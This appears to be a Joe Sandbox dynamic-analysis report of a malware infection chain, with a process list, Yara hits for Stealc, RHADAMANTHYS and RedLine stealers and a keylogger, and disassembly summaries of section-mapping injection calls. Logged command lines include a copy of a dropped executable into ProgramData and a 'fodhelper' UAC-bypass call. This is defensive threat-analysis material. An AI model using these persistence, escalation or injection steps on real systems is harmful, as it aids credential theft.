Show Windows behavior

Target ID:	30
Start time:	17:57:39
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
Imagebase:	0x400000
File size:	183'808 bytes
MD5 hash:	F2AD59753E17F68CF6F6F251E0D4DEEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001E.00000003.2191639090.0000000000950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	17:57:41
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\5A58.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\5A58.exe
Imagebase:	0x400000
File size:	459'264 bytes
MD5 hash:	700A9938D0FCFF91DF12CBEFE7435C88
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	17:57:43
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\617D.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\617D.exe
Imagebase:	0xf10000
File size:	361'984 bytes
MD5 hash:	1A28322108062B67D4248CBFE145DEBF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000020.00000002.2218763067.000000001BD11000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	17:57:48
Start date:	27/12/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0x200000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	17:57:48
Start date:	27/12/2023
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\dialer.exe
Imagebase:	0x7ff742c30000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000022.00000003.2209743343.000001B8F65F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000022.00000003.2203687364.000001B8F6310000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2177329422.000001B8F3EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	17:57:48
Start date:	27/12/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0xf80000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	17:57:48
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\7D14.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\7D14.exe
Imagebase:	0x330000
File size:	3'974'656 bytes
MD5 hash:	460167998760122937411C5191649DBA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000002.2623549730.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000024.00000002.2623549730.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	17:57:52
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\9234.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\9234.exe
Imagebase:	0x690000
File size:	3'632'640 bytes
MD5 hash:	9C815131562310CCECBBE81C49E57029
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000025.00000002.3048629503.000000001C110000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000025.00000002.2797802024.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000002.2797802024.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000025.00000002.3065308983.000000001C540000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	17:57:53
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\A203.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\A203.exe
Imagebase:	0x480000
File size:	307'200 bytes
MD5 hash:	246EB9F40EF75F048C065DE2F8903289
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000026.00000000.2233055154.0000000000482000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000026.00000002.2657468716.0000000002884000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\A203.exe, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	17:57:54
Start date:	27/12/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\9234.exe" "C:\ProgramData\xQfUeydaBrjuHptx.exe" && ping 1.1.1.1
Imagebase:	0x7ff7ccc20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	17:57:54
Start date:	27/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	17:57:55
Start date:	27/12/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Sysnative\cmd.exe /C fodhelper
Imagebase:	0x7ff7ccc20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	17:57:55
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\ABF7.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\ABF7.exe
Imagebase:	0xb00000
File size:	559'441 bytes
MD5 hash:	2E5700376F42724B69E46594A77BC47A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2674601297.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	17:57:55
Start date:	27/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	17:57:55
Start date:	27/12/2023
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping 1.1.1.1
Imagebase:	0x7ff614dc0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	17:57:57
Start date:	27/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	17:57:57
Start date:	27/12/2023
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\net.exe" helpmsg 23
Imagebase:	0xf70000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	17:57:58
Start date:	27/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	52.2%
Total number of Nodes:	46
Total number of Limit Nodes:	1

Executed Functions

Function 00401493 Relevance: 10.7, APIs: 7, Instructions: 204
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015BE
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401630
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401652

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: fa5345047790d33a398048a29c5d42eabc505595b37e4c32f1a0495e4e03cf99
Instruction ID: 97292508dcf634c7f77ce0fe078d71124df21418c1baf26c2829698e64684dd7
Opcode Fuzzy Hash: fa5345047790d33a398048a29c5d42eabc505595b37e4c32f1a0495e4e03cf99
Instruction Fuzzy Hash: 39615171900205FBEB209F91DC49FAF7BB8EF85B10F10412AFA12BA1E5D6749941DB25

Uniqueness

Uniqueness Score: -1.00%

Function 0040149E Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015BE
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401630
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401652

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 63bece36550bc1331b6915176a664c657e1e10d2ec8c82d0c2f52fcf667a0543
Instruction ID: 966aceaf6843322aaccc203d9c5cd55170961763a31915afcbcb3c6e7dd630e5
Opcode Fuzzy Hash: 63bece36550bc1331b6915176a664c657e1e10d2ec8c82d0c2f52fcf667a0543
Instruction Fuzzy Hash: 83510A75900245BFEF209F91CC48FEB7BB8EF85B10F10416AFA11BA2E5D6749945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004014AC Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015BE
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401630
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401652

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 4517f5bade8579ec3562c126fe2d8fca570a5e2e5de3e7acffd78397ea5bb544
Instruction ID: 76b8e04a759d635bde0efe3c3983064c98387ffe1d6c547643d5c02108251d06
Opcode Fuzzy Hash: 4517f5bade8579ec3562c126fe2d8fca570a5e2e5de3e7acffd78397ea5bb544
Instruction Fuzzy Hash: CF510975900249BBEF209F91CC49FEF7BB8EF85B10F10416AFA11BA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004014B3 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015BE
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401630
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401652

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: d1bab02551b93d73db83f338fcd0757f78e8a95fa82f599980ae672ad00f2496
Instruction ID: dc1227ed93abd593f083f9cf7ba07a972f31fc616183e9663e86c653d40fb5c3
Opcode Fuzzy Hash: d1bab02551b93d73db83f338fcd0757f78e8a95fa82f599980ae672ad00f2496
Instruction Fuzzy Hash: 91511975900249BFEF209F91CC48FEF7BB8EF85B10F10416AFA11AA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004014C3 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015BE
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401630
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401652

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 99de84721c1d5f739b751f97031608123db924807c19c43dcdcd78b4bf064aad
Instruction ID: 23080856c1b7ff76fb04a4e89a501db6190a83b13ac99aa6861e550084c1ef18
Opcode Fuzzy Hash: 99de84721c1d5f739b751f97031608123db924807c19c43dcdcd78b4bf064aad
Instruction Fuzzy Hash: 5C511875900209BFEF209F91CC48FAFBBB8EF85B10F104169FA11AA2A5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004014C8 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015BE
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401630
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401652

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f30cc7ee10ba587486875aa956bd947390dae3476bc7c318e70837a016550c2e
Instruction ID: 7e274efce38c54d7660d321cc7e05eb7500457083a3d046f50bbb1a39b4d674f
Opcode Fuzzy Hash: f30cc7ee10ba587486875aa956bd947390dae3476bc7c318e70837a016550c2e
Instruction Fuzzy Hash: 2F510975900209BFEF209F91CC49FAFBBB8EF85B10F104169FA11AA2A5D7749945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401872 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018C2

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
Part of subcall function 00401493: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: d96207d25880d39b0535d0ac00c43109124b90c8a49a1ec25fe0217fe993de35
Instruction ID: 2fc6e1649e40d7d8aa515f875939d9c48bb5623c82f9f1960f81a07532c55d1a
Opcode Fuzzy Hash: d96207d25880d39b0535d0ac00c43109124b90c8a49a1ec25fe0217fe993de35
Instruction Fuzzy Hash: E4117C7660C204E7E6007A909D91E7E3229AB44754F308537BA03790F1D67D9B53B66B

Uniqueness

Uniqueness Score: -1.00%

Function 0040187D Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018C2

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
Part of subcall function 00401493: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 774ac771efc0f2d9642077cc683a2e1254ed462c56384d9adfa96cda85c63677
Instruction ID: a27831e20be30d828ac93e77088343585596c83213a5c0d836373b225eadf0df
Opcode Fuzzy Hash: 774ac771efc0f2d9642077cc683a2e1254ed462c56384d9adfa96cda85c63677
Instruction Fuzzy Hash: C401807760C245EBEB016A909D91AAD3725AB45710F308837BA03B90F1D57D8B53B72B

Uniqueness

Uniqueness Score: -1.00%

Function 0040189F Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018C2

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
Part of subcall function 00401493: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 4b9f825c47b675a723ce52a54777ede7b14526d047448b453c0c6d0e4b5600a6
Instruction ID: 5d3ebebc4721d7029c6b9e1b1a0460a5cdc30c2c30bb337782c290de33ebfc12
Opcode Fuzzy Hash: 4b9f825c47b675a723ce52a54777ede7b14526d047448b453c0c6d0e4b5600a6
Instruction Fuzzy Hash: 60012C7720C205EAEB016A90DD91A7D3225AB44714F348537BA03790F1D67D8753B62B

Uniqueness

Uniqueness Score: -1.00%

Function 004018A6 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018C2

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
Part of subcall function 00401493: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1687943916.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1687926913.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687960413.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1687976529.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_W73PCbSH71.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: dcc36566893298b3aa0c8f0c433f989bcf173dd712984c78a1a3356108b5d492
Instruction ID: cf9a23ed1c9ca71473302ff21d04c27dba4fa111840ab99c2467ad2d40a32c04
Opcode Fuzzy Hash: dcc36566893298b3aa0c8f0c433f989bcf173dd712984c78a1a3356108b5d492
